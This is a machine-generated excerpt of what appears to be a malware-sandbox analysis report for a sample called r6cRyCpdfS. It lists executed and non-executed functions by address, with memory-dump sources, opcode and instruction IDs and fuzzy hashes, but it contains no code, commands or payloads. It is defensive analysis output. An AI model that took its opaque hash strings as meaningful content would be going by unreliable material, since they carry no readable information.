                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 11f67a651579cb95684c1e5c9a23f36ae63f09ed1006ec80f157a53054c8d650
                                                                                                                            • Instruction ID: 5f31b98063b0d79fa7aeeed24c128ce27b6f17c7f2b06ba18752ff4c508253a2
                                                                                                                            • Opcode Fuzzy Hash: 11f67a651579cb95684c1e5c9a23f36ae63f09ed1006ec80f157a53054c8d650
                                                                                                                            • Instruction Fuzzy Hash: 5FB09202F4E20B52F93004F4047413C00410B84B85A120B34A10A865E6DD4A2A00A150

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8809B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1776671166.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: 98cb04ec4c69b825196d444a49bdf79c7170145f8ea94898da4343ee042ea434
                                                                                                                            • Instruction ID: 50dda8b2e71c9c6ab8bbcc3f16dbd51bf8c74e3cf593e2378437cd06dd4167a8
                                                                                                                            • Opcode Fuzzy Hash: 98cb04ec4c69b825196d444a49bdf79c7170145f8ea94898da4343ee042ea434
                                                                                                                            • Instruction Fuzzy Hash: 9E41F287F1847385E31E33FD79299EC5B40DF8123CB0846B7E16E8A0C7AD88648792E5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B8A0D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 50507bdb859e22495c15f8defb600920ef252d583d09360140d8849c0d205358
                                                                                                                            • Instruction ID: 18384b022a1fc8fb8d1fe0ed6343ad75c91d47f8f479ada5e0f8f80b7905c1ba
                                                                                                                            • Opcode Fuzzy Hash: 50507bdb859e22495c15f8defb600920ef252d583d09360140d8849c0d205358
                                                                                                                            • Instruction Fuzzy Hash: 3591E271A19A8D8FEB98DB6888657A9BFE1FF5A310F4101BAD04DD32E6DB742411C701
                                                                                                                            Function 00007FFD9B8A08D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 932726f6d6ae8986f33717597d8ad8de4ce149f16013aa6c56e44f084b91bd86
                                                                                                                            • Instruction ID: 226683079f477da82edf303e889dca0503d3b10d74ada4fa110968d10f84d947
                                                                                                                            • Opcode Fuzzy Hash: 932726f6d6ae8986f33717597d8ad8de4ce149f16013aa6c56e44f084b91bd86
                                                                                                                            • Instruction Fuzzy Hash: 5F415822B0C5294EE309B7AC74A96FD7781EF89325F0545FBD04EC71D7ED18A8428284
                                                                                                                            Function 00007FFD9B8A0C25 Relevance: .1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c9d2fb6c6428839c8dc9a5ed2f0aa41e667bf874a23362970daa6c53f8ce729c
                                                                                                                            • Instruction ID: f2361e822e763b9e7c849459f130162803f6f6234ad1de5aade4d9fedebab92d
                                                                                                                            • Opcode Fuzzy Hash: c9d2fb6c6428839c8dc9a5ed2f0aa41e667bf874a23362970daa6c53f8ce729c
                                                                                                                            • Instruction Fuzzy Hash: DC312932B1E69D8BE726A7A898651EC7B60EF56314F0542F3D04C8B1D3DE38264687A1
                                                                                                                            Function 00007FFD9B8A0998 Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 85e7dc2a0dd40a2bf648081a3141436e3bff639b8c155182f9c9746fc2ee200b
                                                                                                                            • Instruction ID: dcf8f31d41b12b8e213f61ae3c47139aeccd6be4073fb209b065a252bc52393a
                                                                                                                            • Opcode Fuzzy Hash: 85e7dc2a0dd40a2bf648081a3141436e3bff639b8c155182f9c9746fc2ee200b
                                                                                                                            • Instruction Fuzzy Hash: 1D21F920B1891D0FE758F76C547A779B6C6EB9D351F4140BEE40EC33E6DD28AC428255
                                                                                                                            Function 00007FFD9B8A11AD Relevance: .1, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b13600a273385bf4a4848ba1c8cdb943f18498ed4d4540ce13e0ad3afaab04bf
                                                                                                                            • Instruction ID: 077a2ab896e1e385e54805f9767a7fa825883ceaccc190278b051bd3ac68dd0c
                                                                                                                            • Opcode Fuzzy Hash: b13600a273385bf4a4848ba1c8cdb943f18498ed4d4540ce13e0ad3afaab04bf
                                                                                                                            • Instruction Fuzzy Hash: 23316231A0DA4E8FDB49EB64C864AB97BF1FF5A300B0505FBD009D71A6DB38A940CB50
                                                                                                                            Function 00007FFD9B8A10CD Relevance: .1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be9d847b580dbde7530ec25c9d47f18ec0154480111b32349da3ae6aeca864ba
                                                                                                                            • Instruction ID: 23b148c58ec37e5b24f620370b389f16d2d438fca59c14d7a0899ca9f1b04d15
                                                                                                                            • Opcode Fuzzy Hash: be9d847b580dbde7530ec25c9d47f18ec0154480111b32349da3ae6aeca864ba
                                                                                                                            • Instruction Fuzzy Hash: D701F421A8E6C60FE76A97B05C729A27FA4DF8B21070A01FAD085CB5F3CC4D5986C361
                                                                                                                            Function 00007FFD9B8A0BB5 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 711c08e7c814b4be97d73f9ca9ff6a119cb5e5c776dfc9583cb40676b33f643d
                                                                                                                            • Instruction ID: decc4f43d94fe0a320b31720b61fd7784de3a6915eecf42466f260f9639cabaf
                                                                                                                            • Opcode Fuzzy Hash: 711c08e7c814b4be97d73f9ca9ff6a119cb5e5c776dfc9583cb40676b33f643d
                                                                                                                            • Instruction Fuzzy Hash: DF01D861A1D42685D71A33ACF9654EC3750DF4632DB0942F3D01D8A4E3AE986486D365
                                                                                                                            Function 00007FFD9B8A0C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7e0197b423aac29a8e68c7a9dc740efbd669bc43ca0ac69d60c9dfd5e7211c93
                                                                                                                            • Instruction ID: da1c38f36c2f6ea7c38bcd14971652312b5d8201e85c1661db88265c357583c6
                                                                                                                            • Opcode Fuzzy Hash: 7e0197b423aac29a8e68c7a9dc740efbd669bc43ca0ac69d60c9dfd5e7211c93
                                                                                                                            • Instruction Fuzzy Hash: 1A11A531F1E68D9FE712DBA4886009D7BB0EF56710F0641F7C048DB2E2D938664A8790
                                                                                                                            Function 00007FFD9B8A0C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7b77214055d9c630a3c227829d3bfced16b92dd6a16533b2c6c4e56c9887dbca
                                                                                                                            • Instruction ID: fc1ccfb2be374b93104792a57320952051fde2eba8a51273795ab39ded188bd9
                                                                                                                            • Opcode Fuzzy Hash: 7b77214055d9c630a3c227829d3bfced16b92dd6a16533b2c6c4e56c9887dbca
                                                                                                                            • Instruction Fuzzy Hash: 67018031E1E28D9FE722DBA488A049D7BB0EF16710F1641F7C048DB2E2E93866468791
                                                                                                                            Function 00007FFD9B8A696B Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cb44bd30831766e4a6f859358ef447a7b1d8ee2e5c607141dad0edfbaf0fe305
                                                                                                                            • Instruction ID: eb2a3573a84cabdf8e885f1446e001fd28bbc4ffe71c3904ca59e53ce98bd7a0
                                                                                                                            • Opcode Fuzzy Hash: cb44bd30831766e4a6f859358ef447a7b1d8ee2e5c607141dad0edfbaf0fe305
                                                                                                                            • Instruction Fuzzy Hash: 3DF0EC75A08A188FDF54EF08C8A4E99B3E1FBA9315F054299D40ED7264DB34AE84CF81
                                                                                                                            Function 00007FFD9B8A1100 Relevance: .0, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8e15d1aae266969bf31dd33b76dd30be5f0f8346dd6495503a623f365a2cd858
                                                                                                                            • Instruction ID: fd41f50acb1db59d48f47f271166a4f97c22518feb60bc5ef8854d01e8b2a64a
                                                                                                                            • Opcode Fuzzy Hash: 8e15d1aae266969bf31dd33b76dd30be5f0f8346dd6495503a623f365a2cd858
                                                                                                                            • Instruction Fuzzy Hash: 82E02621F4CC4906EBACA67438B25B1B280DB8931470505BDD01AC22DADC195C814281
                                                                                                                            Function 00007FFD9B8A4F9A Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction ID: 18c12664002936a2eee9197aa17dcd864628df0702f4fdcb8a9517511541f8ba
                                                                                                                            • Opcode Fuzzy Hash: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction Fuzzy Hash: F4E09230F0951E8AFBF0A340C8603F962619F8C700F1A00B5C80EE32E1DD286F81C710
                                                                                                                            Function 00007FFD9B8A0B92 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction ID: b48cd5f71409a24054d145006df8ef09d8d7bfd289156efe669d32a7515f1873
                                                                                                                            • Opcode Fuzzy Hash: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction Fuzzy Hash: E6D0A73166EA8E4FEB02B7B8DC5A4547FA0EF1F215FDA14E2D008CB5B2D5055999C701
                                                                                                                            Function 00007FFD9B8A1270 Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction ID: d8a09b481ca081fc19b32288a85295b7b226be38ccbd6673d180672c6e16dc1c
                                                                                                                            • Opcode Fuzzy Hash: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction Fuzzy Hash: CEC0123061180C9FCA88FB28C894D14B3A0FB1D304B960094E00DCB2B1E62AECC6CB40
                                                                                                                            Function 00007FFD9B8A06A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction ID: cf8b1511bca6861f126c738684d092e320ea0aa4ac3cc11059dc86341731be83
                                                                                                                            • Opcode Fuzzy Hash: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction Fuzzy Hash: 66C00205F6B65E01E83573AA98660ACA1405BDDE18FD61172D54D400A1A84D22990166
                                                                                                                            Function 00007FFD9B8A2A44 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5be088b4fb35ac8be677ef202fff3602dbfbd799938a331c79c29e9996e63207
                                                                                                                            • Instruction ID: 47f239f226aa420d512440487086fe016c5d0ba93009d2caaf14cabeaac3be47
                                                                                                                            • Opcode Fuzzy Hash: 5be088b4fb35ac8be677ef202fff3602dbfbd799938a331c79c29e9996e63207
                                                                                                                            • Instruction Fuzzy Hash: 6AC04C11F1C81A06E7597354542167E44539B44644FD90475E41EE73CECD5D6E1242D7
                                                                                                                            Function 00007FFD9B8A06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: 500de31fcb602731ecb130915a19b6f2b80e3f21754f6ce5700eee3f78151dc1
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: 74B00204E7744F01E47833FA199616574545B4D614FD61170D44D50195984D36991267

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8A09B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.2187755344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: efb77ea5f0da1de96a94b877d211cc8378bf186da6759c58b54f7359f13cb85e
                                                                                                                            • Instruction ID: fa77125614068ae6b4ae2141eb752504fbd7486b0eee6ed5bfa7fe3a6792f0ed
                                                                                                                            • Opcode Fuzzy Hash: efb77ea5f0da1de96a94b877d211cc8378bf186da6759c58b54f7359f13cb85e
                                                                                                                            • Instruction Fuzzy Hash: 8641A187B1947A85E31E37FC79299FD6B44CF8533DB0843B7E05D8A0C76D88608692E5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B8A0D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.2193884720.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffd9b8a0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d0c9e6b943f3c29e625031431123844173caa68dbc96d35cce4bd9a0e6d85631
                                                                                                                            • Instruction ID: 038db80928aa91692a037c9b50f17a3288afe7d66556c8f6e0913d871bf3a8bc
                                                                                                                            • Opcode Fuzzy Hash: d0c9e6b943f3c29e625031431123844173caa68dbc96d35cce4bd9a0e6d85631
                                                                                                                            • Instruction Fuzzy Hash: B9910371A19A8D8FEB89DF688865BA97FE0FB5A311F4401BED04DD32E2CB782411C701
                                                                                                                            Function 00007FFD9B8D15A9 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.2193884720.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffd9b8d1000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 85c91f5ad7193c1ebaf98fda6635a70a498f71c8d1a03949869f0e6afadfb1ff
                                                                                                                            • Instruction ID: 1d732d8dc34365686f11bbfac9fe27c82cfdf1aa8c7d2a7e89b563b0402cb05f
                                                                                                                            • Opcode Fuzzy Hash: 85c91f5ad7193c1ebaf98fda6635a70a498f71c8d1a03949869f0e6afadfb1ff
                                                                                                                            • Instruction Fuzzy Hash: 3C11C671A0F6894FDB15AB788869498BFB0EF5A300F0642EBD04ACB1A3ED299945C741
                                                                                                                            Function 00007FFD9B8DB089 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.2193884720.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffd9b8d1000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 270c655ade8c41a48ec8c09ab02377e0019eceadba05352cf1249c358c7f4dd3
                                                                                                                            • Instruction ID: 72a8a3520cd86fd5879b428675c29c93012af4e2130465eb946eb2c006f465fa
                                                                                                                            • Opcode Fuzzy Hash: 270c655ade8c41a48ec8c09ab02377e0019eceadba05352cf1249c358c7f4dd3
                                                                                                                            • Instruction Fuzzy Hash: 0DE0656190B7854FCB15AA3484698547FA0EF6760174A52EFC045CF1A3EA2DD8C6C701
                                                                                                                            Function 00007FFD9B8DAFB9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.2193884720.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffd9b8d1000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 9cf620831439448f85a6df8655cd548ef7c3abc58249074df2b4aaf4415ec1d6
                                                                                                                            • Instruction ID: 5f04116de9c20bd4d97326ff61ce4ba1004bd5c037592b66e5e53673f9550fb6
                                                                                                                            • Opcode Fuzzy Hash: 9cf620831439448f85a6df8655cd548ef7c3abc58249074df2b4aaf4415ec1d6
                                                                                                                            • Instruction Fuzzy Hash: 52E06D6160B7844FCB1AAA358869854BFA0EF6760174A52EFC045CB1A3EA2DD88AC701
                                                                                                                            Function 00007FFD9B8D3B79 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.2193884720.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffd9b8d1000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 4a8e4a8f597a4a3e6813092c966bfb03a571af712c5925d52cb04d1b18ab1b3c
                                                                                                                            • Instruction ID: ce1df7c275c8bd1034a17ce4d57469ea7640a527a3b325702e937a8f6b7695e2
                                                                                                                            • Opcode Fuzzy Hash: 4a8e4a8f597a4a3e6813092c966bfb03a571af712c5925d52cb04d1b18ab1b3c
                                                                                                                            • Instruction Fuzzy Hash: 56E06D7160E7C44FC71AAA388869454BFA0EF6721174A42EFC045CF1A3EA2D8889C701
                                                                                                                            Function 00007FFD9B8D28B9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.2193884720.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffd9b8d1000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 91a95915b5e75e7a2b502dd5daa15a8916a49cafdacfe1b1686e0cfd496134bd
                                                                                                                            • Instruction ID: 2ecc8645f13b92adb65702f1859f0667e2d99e8eee0769620b3917e2473a6cb5
                                                                                                                            • Opcode Fuzzy Hash: 91a95915b5e75e7a2b502dd5daa15a8916a49cafdacfe1b1686e0cfd496134bd
                                                                                                                            • Instruction Fuzzy Hash: 8DE06D2164E3C04FCB16AB3488688547F60EE6720178A52EFC046CF1A3EA2D898AC701
                                                                                                                            Function 00007FFD9B8D8D09 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.2193884720.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffd9b8d1000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 0fca2ecdda84ecfb6ae370d3990d8e5c216c76da1751e9b0afab1592ca81ade9
                                                                                                                            • Instruction ID: 9d09eec114bf921513aad1e57915617d5c34e3351fa5e47436403cfbad848b74
                                                                                                                            • Opcode Fuzzy Hash: 0fca2ecdda84ecfb6ae370d3990d8e5c216c76da1751e9b0afab1592ca81ade9
                                                                                                                            • Instruction Fuzzy Hash: 48E0656140F3C04FCB06AB34886A8047FB0AE6B21078A81EEC085CB1B3E6298849C701
